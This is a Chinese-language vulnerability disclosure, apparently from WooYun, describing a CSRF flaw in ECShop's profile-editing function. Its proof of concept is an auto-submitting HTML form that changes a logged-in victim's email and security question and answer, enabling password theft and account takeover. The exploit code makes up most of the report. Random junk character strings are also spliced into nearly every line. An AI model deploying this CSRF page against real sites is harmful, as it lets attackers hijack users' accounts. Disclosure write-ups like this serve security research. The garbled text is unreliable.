简要描述:% s. C; n+ R3 X/ c
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
( t3 A* T. q6 l3 G1 K" G" C$ `" H* E
Demo For:http://www.wooyun.org/bug.php?action=view&id=3950 x: Y5 q, m& l' \7 L
6 ?( G$ f; s' ~- O( P! j1 i详细说明:
# z. I1 [0 n' q2 @利用csrf和xss可以突破官方所说的“障碍”
( p: z' X$ Q. c O5 Z" N0 Jxss版本已经有人说明7 D/ H ^ `5 G. Y% V$ W) K. n
这里给出csrf版本
, [6 y1 j6 q6 |; o9 i
" }. b% L9 P4 d6 E4 k/ K6 ?漏洞证明:7 c2 Y j0 r' _
<html>4 t5 M' }* F! ?. p) J. p; B% O
<body>
! t! o7 [ x3 j$ s; H$ S. u. E8 B+ M<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
+ q' V, d* }4 E+ Z) H! ]" ?<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">. G( f& m# H( a
<INPUT TYPE="text" NAME="act" value="act_edit_profile">* u4 c5 K1 S+ m1 `2 [6 w8 m3 I
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
# p: F" l, z8 I" c. v<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
: C% I5 T+ ?6 r% l1 n</body>
- ^3 d- D8 T, M5 \& t<script>: w7 \; s0 f6 j
document.forms[0].submit();" O8 e) j. W7 `& K- T9 U8 h
</script>$ U# w( ^4 A' ^
</html> s' @: l- _' Y4 C9 f
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失3 ^; C# G7 d5 q- E
) E7 G3 N* i2 j. w! p P/ W3 m
|